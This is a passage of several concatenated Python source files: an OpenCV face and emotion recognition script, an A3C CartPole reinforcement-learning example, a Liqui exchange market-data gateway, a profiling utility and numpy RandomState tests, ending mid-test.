label_bottom = label_top + label_size[1]
cv2.rectangle(img_cp, (label_left - 1, label_top - 1), (label_right + 1, label_bottom + 1), label_background_color, -1)
cv2.putText(img_cp, label_text, (label_left, label_bottom), cv2.FONT_HERSHEY_SIMPLEX, 0.5, label_text_color, 1)
cv2.putText(img_cp, fps, (width-170,15), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (38,0,255), 1, cv2.LINE_AA)
cv2.putText(img_cp, detectfps, (width-170,30), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (38,0,255), 1, cv2.LINE_AA)
return img_cp
except:
import traceback
traceback.print_exc()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-cm','--modeofcamera',dest='mode_of_camera',type=int,default=0,help='Camera Mode. 0:=USB Camera, 1:=PiCamera (Default=0)')
parser.add_argument('-cn','--numberofcamera',dest='number_of_camera',type=int,default=0,help='USB camera number. (Default=0)')
parser.add_argument('-wd','--width',dest='camera_width',type=int,default=640,help='Width of the frames in the video stream. (Default=640)')
parser.add_argument('-ht','--height',dest='camera_height',type=int,default=480,help='Height of the frames in the video stream. (Default=480)')
parser.add_argument('-numncs','--numberofncs',dest='number_of_ncs',type=int,default=1,help='Number of NCS. (Default=1)')
parser.add_argument('-vidfps','--fpsofvideo',dest='fps_of_video',type=int,default=30,help='FPS of Video. (Default=30)')
parser.add_argument('-fdmp','--facedetectionmodelpath',dest='fd_model_path',default='./FP16/face-detection-retail-0004',help='Face Detection model path. (xml and bin. Except extension.)')
parser.add_argument('-emmp','--emotionrecognitionmodelpath',dest='em_model_path',default='./FP16/emotions-recognition-retail-0003',help='Emotion Recognition model path. (xml and bin. Except extension.)')
args = parser.parse_args()
mode_of_camera = args.mode_of_camera
number_of_camera = args.number_of_camera
camera_width = args.camera_width
camera_height = args.camera_height
number_of_ncs = args.number_of_ncs
vidfps = args.fps_of_video
fd_model_path = args.fd_model_path
em_model_path = args.em_model_path
try:
mp.set_start_method('forkserver')
frameBuffer = mp.Queue(10)
resultsFd = mp.Queue() # Face Detection Queue
resultsEm = mp.Queue() # Emotion Recognition Queue
# Start streaming
p = mp.Process(target=camThread,
args=(LABELS, resultsEm, frameBuffer, camera_width, camera_height, vidfps, number_of_camera, mode_of_camera),
daemon=True)
p.start()
processes.append(p)
# Start detection MultiStick
# Activation of inferencer
p = mp.Process(target=inferencer,
args=(resultsFd, resultsEm, frameBuffer, number_of_ncs, fd_model_path, em_model_path),
daemon=True)
p.start()
processes.append(p)
while True:
sleep(1)
except:
import traceback
traceback.print_exc()
finally:
for p in range(len(processes)):
processes[p].terminate()
print("\n\nFinished\n\n")
|
A3C_discrete_action.py
|
"""
Asynchronous Advantage Actor Critic (A3C) with discrete action space, Reinforcement Learning.
The Cartpole example.
View more on my tutorial page: https://morvanzhou.github.io/tutorials/
Using:
tensorflow 1.8.0
gym 0.10.5
"""
import multiprocessing
import threading
import tensorflow as tf
import numpy as np
import gym
import os
import shutil
import matplotlib.pyplot as plt
GAME = 'CartPole-v0'
OUTPUT_GRAPH = True
LOG_DIR = './log'
N_WORKERS = multiprocessing.cpu_count()
MAX_GLOBAL_EP = 1000
GLOBAL_NET_SCOPE = 'Global_Net'
UPDATE_GLOBAL_ITER = 10
GAMMA = 0.9
ENTROPY_BETA = 0.001
LR_A = 0.001 # learning rate for actor
LR_C = 0.001 # learning rate for critic
GLOBAL_RUNNING_R = []
GLOBAL_EP = 0
env = gym.make(GAME)
N_S = env.observation_space.shape[0]
N_A = env.action_space.n
class ACNet(object):
def __init__(self, scope, globalAC=None):
if scope == GLOBAL_NET_SCOPE: # get global network
with tf.variable_scope(scope):
self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
self.a_params, self.c_params = self._build_net(scope)[-2:]
else: # local net, calculate losses
with tf.variable_scope(scope):
self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
self.a_his = tf.placeholder(tf.int32, [None, ], 'A')
self.v_target = tf.placeholder(tf.float32, [None, 1], 'Vtarget')
self.a_prob, self.v, self.a_params, self.c_params = self._build_net(scope)
td = tf.subtract(self.v_target, self.v, name='TD_error')
with tf.name_scope('c_loss'):
self.c_loss = tf.reduce_mean(tf.square(td))
with tf.name_scope('a_loss'):
log_prob = tf.reduce_sum(tf.log(self.a_prob) * tf.one_hot(self.a_his, N_A, dtype=tf.float32), axis=1, keep_dims=True)
exp_v = log_prob * tf.stop_gradient(td)
entropy = -tf.reduce_sum(self.a_prob * tf.log(self.a_prob + 1e-5),
axis=1, keep_dims=True) # encourage exploration
self.exp_v = ENTROPY_BETA * entropy + exp_v
self.a_loss = tf.reduce_mean(-self.exp_v)
with tf.name_scope('local_grad'):
self.a_grads = tf.gradients(self.a_loss, self.a_params)
self.c_grads = tf.gradients(self.c_loss, self.c_params)
with tf.name_scope('sync'):
with tf.name_scope('pull'):
self.pull_a_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.a_params, globalAC.a_params)]
self.pull_c_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.c_params, globalAC.c_params)]
with tf.name_scope('push'):
self.update_a_op = OPT_A.apply_gradients(zip(self.a_grads, globalAC.a_params))
self.update_c_op = OPT_C.apply_gradients(zip(self.c_grads, globalAC.c_params))
def _build_net(self, scope):
w_init = tf.random_normal_initializer(0., .1)
with tf.variable_scope('actor'):
l_a = tf.layers.dense(self.s, 200, tf.nn.relu6, kernel_initializer=w_init, name='la')
a_prob = tf.layers.dense(l_a, N_A, tf.nn.softmax, kernel_initializer=w_init, name='ap')
with tf.variable_scope('critic'):
l_c = tf.layers.dense(self.s, 100, tf.nn.relu6, kernel_initializer=w_init, name='lc')
v = tf.layers.dense(l_c, 1, kernel_initializer=w_init, name='v') # state value
a_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/actor')
c_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/critic')
return a_prob, v, a_params, c_params
def update_global(self, feed_dict): # run by a local
SESS.run([self.update_a_op, self.update_c_op], feed_dict) # local grads applies to global net
def pull_global(self): # run by a local
SESS.run([self.pull_a_params_op, self.pull_c_params_op])
def choose_action(self, s): # run by a local
prob_weights = SESS.run(self.a_prob, feed_dict={self.s: s[np.newaxis, :]})
action = np.random.choice(range(prob_weights.shape[1]),
p=prob_weights.ravel()) # select action w.r.t the actions prob
return action
class Worker(object):
def __init__(self, name, globalAC):
self.env = gym.make(GAME).unwrapped
self.name = name
self.AC = ACNet(name, globalAC)
def work(self):
global GLOBAL_RUNNING_R, GLOBAL_EP
total_step = 1
buffer_s, buffer_a, buffer_r = [], [], []
while not COORD.should_stop() and GLOBAL_EP < MAX_GLOBAL_EP:
s = self.env.reset()
ep_r = 0
while True:
# if self.name == 'W_0':
# self.env.render()
a = self.AC.choose_action(s)
s_, r, done, info = self.env.step(a)
if done: r = -5
ep_r += r
buffer_s.append(s)
buffer_a.append(a)
buffer_r.append(r)
if total_step % UPDATE_GLOBAL_ITER == 0 or done: # update global and assign to local net
if done:
v_s_ = 0 # terminal
else:
v_s_ = SESS.run(self.AC.v, {self.AC.s: s_[np.newaxis, :]})[0, 0]
buffer_v_target = []
for r in buffer_r[::-1]: # reverse buffer r
v_s_ = r + GAMMA * v_s_
buffer_v_target.append(v_s_)
buffer_v_target.reverse()
buffer_s, buffer_a, buffer_v_target = np.vstack(buffer_s), np.array(buffer_a), np.vstack(buffer_v_target)
feed_dict = {
self.AC.s: buffer_s,
self.AC.a_his: buffer_a,
self.AC.v_target: buffer_v_target,
}
self.AC.update_global(feed_dict)
buffer_s, buffer_a, buffer_r = [], [], []
self.AC.pull_global()
s = s_
total_step += 1
if done:
if len(GLOBAL_RUNNING_R) == 0: # record running episode reward
GLOBAL_RUNNING_R.append(ep_r)
else:
GLOBAL_RUNNING_R.append(0.99 * GLOBAL_RUNNING_R[-1] + 0.01 * ep_r)
print(
self.name,
"Ep:", GLOBAL_EP,
"| Ep_r: %i" % GLOBAL_RUNNING_R[-1],
)
GLOBAL_EP += 1
break
if __name__ == "__main__":
SESS = tf.Session()
with tf.device("/cpu:0"):
OPT_A = tf.train.RMSPropOptimizer(LR_A, name='RMSPropA')
OPT_C = tf.train.RMSPropOptimizer(LR_C, name='RMSPropC')
GLOBAL_AC = ACNet(GLOBAL_NET_SCOPE) # we only need its params
workers = []
# Create worker
for i in range(N_WORKERS):
i_name = 'W_%i' % i # worker name
workers.append(Worker(i_name, GLOBAL_AC))
COORD = tf.train.Coordinator()
SESS.run(tf.global_variables_initializer())
if OUTPUT_GRAPH:
if os.path.exists(LOG_DIR):
shutil.rmtree(LOG_DIR)
tf.summary.FileWriter(LOG_DIR, SESS.graph)
worker_threads = []
for worker in workers:
job = lambda: worker.work()
t = threading.Thread(target=job)
t.start()
worker_threads.append(t)
COORD.join(worker_threads)
plt.plot(np.arange(len(GLOBAL_RUNNING_R)), GLOBAL_RUNNING_R)
plt.xlabel('step')
plt.ylabel('Total moving reward')
plt.show()
|
liqui.py
|
from befh.restful_api_socket import RESTfulApiSocket
from befh.exchanges.gateway import ExchangeGateway
from befh.market_data import L2Depth, Trade
from befh.util import Logger
from befh.instrument import Instrument
from befh.clients.sql_template import SqlClientTemplate
from functools import partial
from datetime import datetime
from multiprocessing import Process
import time
class ExchGwApiLiqui(RESTfulApiSocket):
"""
Exchange gateway RESTfulApi
"""
def __init__(self):
RESTfulApiSocket.__init__(self)
@classmethod
def get_timestamp_offset(cls):
return 1
@classmethod
def get_trades_timestamp_field_name(cls):
return 'timestamp'
@classmethod
def get_bids_field_name(cls):
return 'bids'
@classmethod
def get_asks_field_name(cls):
return 'asks'
@classmethod
def get_trade_side_field_name(cls):
return 'type'
@classmethod
def get_trade_id_field_name(cls):
return 'tid'
@classmethod
def get_trade_price_field_name(cls):
return 'price'
@classmethod
def get_trade_volume_field_name(cls):
return 'amount'
@classmethod
def get_order_book_link(cls, instmt):
return "https://api.liqui.io/api/3/depth/{0}".format(
instmt.get_instmt_code())
@classmethod
def get_trades_link(cls, instmt):
return "https://api.liqui.io/api/3/trades/{0}?limit=20".format(
(instmt.get_instmt_code()))
@classmethod
def parse_l2_depth(cls, instmt, raw):
"""
Parse raw data to L2 depth
:param instmt: Instrument
:param raw: Raw data in JSON
"""
l2_depth = L2Depth()
raw = raw[instmt.instmt_code]
keys = list(raw.keys())
if (cls.get_bids_field_name() in keys and
cls.get_asks_field_name() in keys):
# Date time
l2_depth.date_time = datetime.utcnow().strftime("%Y%m%d %H:%M:%S.%f")
# Bids
bids = raw[cls.get_bids_field_name()]
for i in range(0, 5):
l2_depth.bids[i].price = float(bids[i][0]) if not isinstance(bids[i][0], float) else bids[i][0]
l2_depth.bids[i].volume = float(bids[i][1]) if not isinstance(bids[i][1], float) else bids[i][1]
# Asks
asks = raw[cls.get_asks_field_name()]
for i in range(0, 5):
l2_depth.asks[i].price = float(asks[i][0]) if not isinstance(asks[i][0], float) else asks[i][0]
l2_depth.asks[i].volume = float(asks[i][1]) if not isinstance(asks[i][1], float) else asks[i][1]
else:
raise Exception('Does not contain order book keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return l2_depth
@classmethod
def parse_trade(cls, instmt, raw):
"""
:param instmt: Instrument
:param raw: Raw data in JSON
:return:
"""
trade = Trade()
keys = list(raw.keys())
if cls.get_trades_timestamp_field_name() in keys and \
cls.get_trade_id_field_name() in keys and \
cls.get_trade_price_field_name() in keys and \
cls.get_trade_volume_field_name() in keys:
# Date time
date_time = float(raw[cls.get_trades_timestamp_field_name()])
date_time = date_time / cls.get_timestamp_offset()
trade.date_time = datetime.utcfromtimestamp(date_time).strftime("%Y%m%d %H:%M:%S.%f")
# Trade side
trade.trade_side = 1
# Trade id
trade.trade_id = str(raw[cls.get_trade_id_field_name()])
# Trade price
trade.trade_price = float(str(raw[cls.get_trade_price_field_name()]))
# Trade volume
trade.trade_volume = float(str(raw[cls.get_trade_volume_field_name()]))
else:
raise Exception('Does not contain trade keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return trade
@classmethod
def get_order_book(cls, instmt):
"""
Get order book
:param instmt: Instrument
:return: Object L2Depth
"""
res = cls.request(cls.get_order_book_link(instmt))
if len(res) > 0:
return cls.parse_l2_depth(instmt=instmt,
raw=res)
else:
return None
@classmethod
def get_trades(cls, instmt):
"""
Get trades
:param instmt: Instrument
:param trade_id: Trade id
:return: List of trades
"""
link = cls.get_trades_link(instmt)
res = cls.request(link)
trades = []
if len(res) > 0:
res = res[instmt.instmt_code]
for i in range(0, len(res)):
t = res[len(res) - 1 - i]
trade = cls.parse_trade(instmt=instmt,
raw=t)
trades.append(trade)
return trades
class ExchGwLiqui(ExchangeGateway):
"""
Exchange gateway
"""
def __init__(self, db_clients):
"""
Constructor
:param db_client: Database client
"""
ExchangeGateway.__init__(self, ExchGwApiLiqui(), db_clients)
@classmethod
def get_exchange_name(cls):
"""
Get exchange name
:return: Exchange name string
"""
return 'Liqui'
def get_order_book_worker(self, instmt):
"""
Get order book worker
:param instmt: Instrument
"""
while True:
try:
l2_depth = self.api_socket.get_order_book(instmt)
if l2_depth is not None and l2_depth.is_diff(instmt.get_l2_depth()):
instmt.set_prev_l2_depth(instmt.get_l2_depth())
instmt.set_l2_depth(l2_depth)
instmt.incr_order_book_id()
self.insert_order_book(instmt)
except Exception as e:
Logger.error(self.__class__.__name__, "Error in order book: %s" % e)
time.sleep(1)
def get_trades_worker(self, instmt):
"""
Get order book worker thread
:param instmt: Instrument name
"""
while True:
try:
ret = self.api_socket.get_trades(instmt)
if ret is None or len(ret) == 0:
time.sleep(1)
continue
except Exception as e:
Logger.error(self.__class__.__name__, "Error in trades: %s" % e)
time.sleep(1)
continue
for trade in ret:
assert isinstance(trade.trade_id, str), "trade.trade_id(%s) = %s" % (type(trade.trade_id), trade.trade_id)
assert isinstance(instmt.get_exch_trade_id(), str), \
"instmt.get_exch_trade_id()(%s) = %s" % (type(instmt.get_exch_trade_id()), instmt.get_exch_trade_id())
if int(trade.trade_id) > int(instmt.get_exch_trade_id()):
instmt.set_exch_trade_id(trade.trade_id)
instmt.incr_trade_id()
self.insert_trade(instmt, trade)
# After the first time of getting the trade, indicate the instrument
# is recovered
if not instmt.get_recovered():
instmt.set_recovered(True)
time.sleep(1)
def start(self, instmt):
"""
Start the exchange gateway
:param instmt: Instrument
:return List of threads
"""
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_instmt_snapshot_table_name(self.get_instmt_snapshot_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
self.init_instmt_snapshot_table(instmt)
instmt.set_recovered(False)
t1 = Process(target=partial(self.get_order_book_worker, instmt))
t2 = Process(target=partial(self.get_trades_worker, instmt))
t1.start()
t2.start()
return [t1, t2]
if __name__ == '__main__':
Logger.init_log()
exchange_name = 'Liqui'
instmt_name = 'ETHBTC'
instmt_code = 'eth_btc'
instmt = Instrument(exchange_name, instmt_name, instmt_code)
db_client = SqlClientTemplate()
exch = ExchGwLiqui([db_client])
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_recovered(False)
# exch.get_order_book_worker(instmt)
exch.get_trades_worker(instmt)
|
functionprofiler.py
|
#!/usr/bin/env python
#
#
# TODO:
# - implement cProfile or yappi, or use threading.setProfile and sys.setProfile, or implement one's own multi-threaded profiler:
# http://code.google.com/p/yappi/
# http://code.activestate.com/recipes/465831-profiling-threads/
# http://effbot.org/librarybook/sys.htm
#
#
# CHANGELOG:
# 2014-18-08 - v0.5.1 - lrq3000
# * force refresh (flush) stdout after printing
# * fixed runsnakerun
# 2012-11-12 - v0.5.0 - lrq3000
# * cleaned the functions a bit and added a no timeout mode
# 2010-09-22 - v0.4.3 - lrq3000
# * added error handling if profile and pstats libraries can't be found
# 2010-09-17 - v0.4.2 - lrq3000
# * added an automatic calibration prior to profiling
# 2010-09-17 - v0.4.1 - lrq3000
# * fixed import bug
# 2010-09-16 - v0.4 - lrq3000
# * fallback to profile instead of cProfile : even if this pure python implementation is much slower, it at least work with threads (cProfile, alias hotshot, is not compatible with multi-threaded applications at the moment)
# 2010-09-09 - v0.3 - lrq3000
# * workaround for a bug with cProfile
# 2010-09-08 - v0.2 - lrq3000
# * added the parsestats, browsegui and browsenogui functions
# * centralized runprofile here
# 2010-09-06 - v0.1 - lrq3000
# * Initial version.
__author__ = 'lrq3000'
__version__ = '0.5.0'
noprofiler = False
try:
import profile, pstats # using profile and not cProfile because cProfile does not support multi-threaded applications.
except:
noprofiler = True
import sys, os
pathname = os.path.dirname(sys.argv[0])
sys.path.append(os.path.join(pathname))
from kthread import *
from profilebrowser import *
def runprofile(mainfunction, output, timeout = 0, calibrate=False):
'''
Run the functions profiler and save the result
If timeout is greater than 0, the profile will automatically stops after timeout seconds
'''
if noprofiler == True:
print('ERROR: profiler and/or pstats library missing ! Please install it (probably package named python-profile) before running a profiling !')
return False
# This is the main function for profiling
def _profile():
profile.run(mainfunction, output)
print('=> RUNNING FUNCTIONS PROFILER\n\n'); sys.stdout.flush();
# Calibrate the profiler (only use this if the profiler produces some funny stuff, but calibration can also produce even more funny stuff with the latest cProfile of Python v2.7! So you should only enable calibration if necessary)
if calibrate:
print('Calibrating the profiler...'); sys.stdout.flush();
cval = calibrateprofile()
print('Calibration found value : %s' % cval); sys.stdout.flush();
print('Initializing the profiler...'); sys.stdout.flush();
# Run in timeout mode (if the function cannot ends by itself, this is the best mode: the function must ends for the profile to be saved)
if timeout > 0:
pthread = KThread(target=_profile) # we open the function with the profiler, in a special killable thread (see below why)
print('Will now run the profiling and terminate it in %s seconds. Results will be saved in %s' % (str(timeout), str(output))); sys.stdout.flush();
print('\nCountdown:'); sys.stdout.flush();
for i in range(0,5):
print(str(5-i))
sys.stdout.flush()
time.sleep(1)
print('0\nStarting to profile...'); sys.stdout.flush();
pthread.start() # starting the thread
time.sleep(float(timeout)) # after this amount of seconds, the thread gets killed and the profiler will end its job
print('\n\nFinishing the profile and saving to the file %s' % str(output)); sys.stdout.flush();
pthread.kill() # we must end the main function in order for the profiler to output its results (if we didn't launch a thread and just closed the process, it would have done no result)
# Run in full length mode (we run the function until it ends)
else:
print("Running the profiler, please wait until the process terminates by itself (if you forcequit before, the profile won't be saved)")
_profile()
print('=> Functions Profile done !')
return True
def calibrateprofile():
'''
Calibrate the profiler (necessary to have non negative and more exact values)
'''
pr = profile.Profile()
calib = []
crepeat = 10
for i in range(crepeat):
calib.append(pr.calibrate(10000))
final = sum(calib) / crepeat
profile.Profile.bias = final # Apply computed bias to all Profile instances created hereafter
return final
def parseprofile(profilelog, out):
'''
Parse a profile log and print the result on screen
'''
file = open(out, 'w') # opening the output file
print('Opening the profile in %s...' % profilelog)
p = pstats.Stats(profilelog, stream=file) # parsing the profile with pstats, and output everything to the file
print('Generating the stats, please wait...')
file.write("=== All stats:\n")
p.strip_dirs().sort_stats(-1).print_stats()
file.write("=== Cumulative time:\n")
p.sort_stats('cumulative').print_stats(100)
file.write("=== Time:\n")
p.sort_stats('time').print_stats(100)
file.write("=== Time + cumulative time:\n")
p.sort_stats('time', 'cum').print_stats(.5, 'init')
file.write("=== Callees:\n")
p.print_callees()
file.write("=== Callers:\n")
p.print_callers()
#p.print_callers(.5, 'init')
#p.add('fooprof')
file.close()
print('Stats generated and saved to %s.' % out)
print('Everything is done. Exiting')
def browseprofile(profilelog):
'''
Browse interactively a profile log in console
'''
print('Starting the pstats profile browser...\n')
try:
browser = ProfileBrowser(profilelog)
print >> browser.stream, "Welcome to the profile statistics browser. Type help to get started."
browser.cmdloop()
print >> browser.stream, "Goodbye."
except KeyboardInterrupt:
pass
def browseprofilegui(profilelog):
'''
Browse interactively a profile log in GUI using RunSnakeRun and SquareMap
'''
from runsnakerun import runsnake # runsnakerun needs wxPython lib, if it's not available then we can pass if we don't want a GUI. RunSnakeRun is only used for GUI visualisation, not for profiling (and you can still use pstats for console browsing)
app = runsnake.RunSnakeRunApp(0)
app.OnInit(profilelog)
#app.OnInit()
app.MainLoop()
|
test_randomstate.py
|
import hashlib
import pickle
import sys
import warnings
import numpy as np
import pytest
from numpy.testing import (
assert_, assert_raises, assert_equal, assert_warns,
assert_no_warnings, assert_array_equal, assert_array_almost_equal,
suppress_warnings
)
from numpy.random import MT19937, PCG64
from numpy import random
INT_FUNCS = {'binomial': (100.0, 0.6),
'geometric': (.5,),
'hypergeometric': (20, 20, 10),
'logseries': (.5,),
'multinomial': (20, np.ones(6) / 6.0),
'negative_binomial': (100, .5),
'poisson': (10.0,),
'zipf': (2,),
}
if np.iinfo(int).max < 2**32:
# Windows and some 32-bit platforms, e.g., ARM
INT_FUNC_HASHES = {'binomial': '670e1c04223ffdbab27e08fbbad7bdba',
'logseries': '6bd0183d2f8030c61b0d6e11aaa60caf',
'geometric': '6e9df886f3e1e15a643168568d5280c0',
'hypergeometric': '7964aa611b046aecd33063b90f4dec06',
'multinomial': '68a0b049c16411ed0aa4aff3572431e4',
'negative_binomial': 'dc265219eec62b4338d39f849cd36d09',
'poisson': '7b4dce8e43552fc82701c2fa8e94dc6e',
'zipf': 'fcd2a2095f34578723ac45e43aca48c5',
}
else:
INT_FUNC_HASHES = {'binomial': 'b5f8dcd74f172836536deb3547257b14',
'geometric': '8814571f45c87c59699d62ccd3d6c350',
'hypergeometric': 'bc64ae5976eac452115a16dad2dcf642',
'logseries': '84be924b37485a27c4a98797bc88a7a4',
'multinomial': 'ec3c7f9cf9664044bb0c6fb106934200',
'negative_binomial': '210533b2234943591364d0117a552969',
'poisson': '0536a8850c79da0c78defd742dccc3e0',
'zipf': 'f2841f504dd2525cd67cdcad7561e532',
}
@pytest.fixture(scope='module', params=INT_FUNCS)
def int_func(request):
return (request.param, INT_FUNCS[request.param],
INT_FUNC_HASHES[request.param])
def assert_mt19937_state_equal(a, b):
assert_equal(a['bit_generator'], b['bit_generator'])
assert_array_equal(a['state']['key'], b['state']['key'])
assert_array_equal(a['state']['pos'], b['state']['pos'])
assert_equal(a['has_gauss'], b['has_gauss'])
assert_equal(a['gauss'], b['gauss'])
class TestSeed(object):
def test_scalar(self):
s = random.RandomState(0)
assert_equal(s.randint(1000), 684)
s = random.RandomState(4294967295)
assert_equal(s.randint(1000), 419)
def test_array(self):
s = random.RandomState(range(10))
assert_equal(s.randint(1000), 468)
s = random.RandomState(np.arange(10))
assert_equal(s.randint(1000), 468)
s = random.RandomState([0])
assert_equal(s.randint(1000), 973)
s = random.RandomState([4294967295])
assert_equal(s.randint(1000), 265)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, random.RandomState, -0.5)
assert_raises(ValueError, random.RandomState, -1)
def test_invalid_array(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, random.RandomState, [-0.5])
assert_raises(ValueError, random.RandomState, [-1])
assert_raises(ValueError, random.RandomState, [4294967296])
assert_raises(ValueError, random.RandomState, [1, 2, 4294967296])
assert_raises(ValueError, random.RandomState, [1, -2, 4294967296])
def test_invalid_array_shape(self):
# gh-9832
assert_raises(ValueError, random.RandomState, np.array([],
dtype=np.int64))
assert_raises(ValueError, random.RandomState, [[1, 2, 3]])
assert_raises(ValueError, random.RandomState, [[1, 2, 3],
[4, 5, 6]])
def test_cannot_seed(self):
rs = random.RandomState(PCG64(0))
with assert_raises(TypeError):
rs.seed(1234)
def test_invalid_initialization(self):
assert_raises(ValueError, random.RandomState, MT19937)
class TestBinomial(object):
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype='int')
for p in [0, .5, 1]:
assert_(random.binomial(0, p) == 0)
assert_array_equal(random.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial(object):
def test_basic(self):
random.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= random.randint(-5, -1) < -1)
x = random.randint(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, np.array((2, 2))).shape,
(2, 2, 2))
assert_raises(TypeError, random.multinomial, 1, p,
float(1))
def test_invalid_prob(self):
assert_raises(ValueError, random.multinomial, 100, [1.1, 0.2])
assert_raises(ValueError, random.multinomial, 100, [-.1, 0.9])
def test_invalid_n(self):
assert_raises(ValueError, random.multinomial, -1, [0.8, 0.2])
def test_p_non_contiguous(self):
p = np.arange(15.)
p /= np.sum(p[1::3])
pvals = p[1::3]
random.seed(1432985819)
non_contig = random.multinomial(100, pvals=pvals)
random.seed(1432985819)
contig = random.multinomial(100, pvals=np.ascontiguousarray(pvals))
assert_array_equal(non_contig, contig)
class TestSetState(object):
def setup(self):
self.seed = 1234567890
self.random_state = random.RandomState(self.seed)
self.state = self.random_state.get_state()
def test_basic(self):
old = self.random_state.tomaxint(16)
self.random_state.set_state(self.state)
new = self.random_state.tomaxint(16)
assert_(np.all(old == new))
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.random_state.standard_normal(size=3)
self.random_state.set_state(self.state)
new = self.random_state.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.random_state.standard_normal()
state = self.random_state.get_state()
old = self.random_state.standard_normal(size=3)
self.random_state.set_state(state)
new = self.random_state.standard_normal(size=3)
assert_(np.all(old == new))
def test_backwards_compatibility(self):
# Make sure we can accept old state tuples that do not have the
# cached Gaussian value.
old_state = self.state[:-2]
x1 = self.random_state.standard_normal(size=16)
self.random_state.set_state(old_state)
x2 = self.random_state.standard_normal(size=16)
self.random_state.set_state(self.state)
x3 = self.random_state.standard_normal(size=16)
assert_(np.all(x1 == x2))
assert_(np.all(x1 == x3))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.random_state.negative_binomial(0.5, 0.5)
def test_get_state_warning(self):
rs = random.RandomState(PCG64())
with suppress_warnings() as sup:
w = sup.record(RuntimeWarning)
state = rs.get_state()
assert_(len(w) == 1)
assert isinstance(state, dict)
assert state['bit_generator'] == 'PCG64'
def test_invalid_legacy_state_setting(self):
state = self.random_state.get_state()
new_state = ('Unknown', ) + state[1:]
assert_raises(ValueError, self.random_state.set_state, new_state)
assert_raises(TypeError, self.random_state.set_state,
np.array(new_state, dtype=np.object))
state = self.random_state.get_state(legacy=False)
del state['bit_generator']
assert_raises(ValueError, self.random_state.set_state, state)
def test_pickle(self):
self.random_state.seed(0)
self.random_state.random_sample(100)
self.random_state.standard_normal()
pickled = self.random_state.get_state(legacy=False)
assert_equal(pickled['has_gauss'], 1)
rs_unpick = pickle.loads(pickle.dumps(self.random_state))
unpickled = rs_unpick.get_state(legacy=False)
assert_mt19937_state_equal(pickled, unpickled)
def test_state_setting(self):
attr_state = self.random_state.__getstate__()
self.random_state.standard_normal()
self.random_state.__setstate__(attr_state)
state = self.random_state.get_state(legacy=False)
assert_mt19937_state_equal(attr_state, state)
def test_repr(self):
assert repr(self.random_state).startswith('RandomState(MT19937)')
class TestRandint(object):
rfunc = random.randint
# valid integer/boolean types
itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
def test_unsupported_type(self):
assert_raises(TypeError, self.rfunc, 1, dtype=float)
def test_bounds_checking(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd, dtype=dt)
assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, lbnd, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, 0, dtype=dt)
def test_rng_zero_and_extremes(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = (lbnd + ubnd)//2
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
def test_full_range(self):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
try:
self.rfunc(lbnd, ubnd, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_in_bounds_fuzz(self):
# Don't use fixed seed
random.seed()
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd, size=2**16, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2, size=2**16, dtype=np.bool_)
